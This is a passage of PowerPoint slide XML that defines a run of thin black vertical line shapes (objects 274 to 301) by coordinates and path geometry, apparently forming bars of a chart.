        <p:nvSpPr>
          <p:cNvPr id="274" name="object 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4384337" y="4168279"/>
            <a:ext cx="2517" cy="1522602"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="768350">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="768015"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="object 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4414695" y="4156558"/>
            <a:ext cx="0" cy="1533927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="774064">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="773931"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="object 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4414421" y="4156256"/>
            <a:ext cx="0" cy="1535185"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="774700">
                <a:moveTo>
                  <a:pt x="0" y="773806"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="774082"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="object 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442600" y="3932920"/>
            <a:ext cx="0" cy="1757911"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="887094">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="886784"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="object 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442327" y="3931826"/>
            <a:ext cx="2517" cy="1759171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="887730">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="887336"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="object 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469907" y="3979049"/>
            <a:ext cx="0" cy="1711354"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="863600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="863506"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="object 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4468840" y="3981774"/>
            <a:ext cx="1258" cy="1708837"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="862330">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="862132"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="object 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4497813" y="3647659"/>
            <a:ext cx="0" cy="2043558"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1031239">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1030729"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="object 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4497539" y="3649807"/>
            <a:ext cx="2517" cy="2041039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1029969">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1029652"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="object 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525719" y="3628357"/>
            <a:ext cx="0" cy="2062433"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1040764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1040477"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="object 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4523515" y="3629395"/>
            <a:ext cx="2517" cy="2061175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1040130">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="1039952"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="object 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553571" y="3251890"/>
            <a:ext cx="0" cy="2438680"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1230630">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1230452"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="object 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553298" y="3253520"/>
            <a:ext cx="1258" cy="2437421"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1229995">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="1229630"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="object 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581478" y="3281930"/>
            <a:ext cx="0" cy="2408479"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1215389">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1215293"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="object 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581205" y="3284654"/>
            <a:ext cx="2517" cy="2405963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1214120">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="1213918"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="object 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609330" y="2955367"/>
            <a:ext cx="0" cy="2735650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1380489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1380086"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="object 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608263" y="2955066"/>
            <a:ext cx="1258" cy="2735650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1380489">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="1380238"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="object 291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637236" y="2938735"/>
            <a:ext cx="0" cy="2752008"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1388745">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1388480"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="object 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4636962" y="2941457"/>
            <a:ext cx="2517" cy="2749492"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1387475">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1387106"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="object 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665142" y="2557452"/>
            <a:ext cx="0" cy="3133288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1581150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1580886"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="object 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4662938" y="2557698"/>
            <a:ext cx="2517" cy="3133288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1581150">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="1580762"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="object 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692996" y="2555318"/>
            <a:ext cx="0" cy="3135805"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1582420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1581963"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="object 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692723" y="2556658"/>
            <a:ext cx="1258" cy="3134546"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1581785">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="1581287"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="object 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4720901" y="2353175"/>
            <a:ext cx="0" cy="3337141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1684020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1683965"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="object 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4720628" y="2353678"/>
            <a:ext cx="2517" cy="3337141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1684020">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="1683716"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="object 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4748753" y="2353678"/>
            <a:ext cx="0" cy="3337141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1684020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1683716"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="object 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747688" y="2353924"/>
            <a:ext cx="1258" cy="3337141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1684020">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="1683592"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="object 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776659" y="1950991"/>
            <a:ext cx="0" cy="3739812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1887220">
                <a:moveTo>
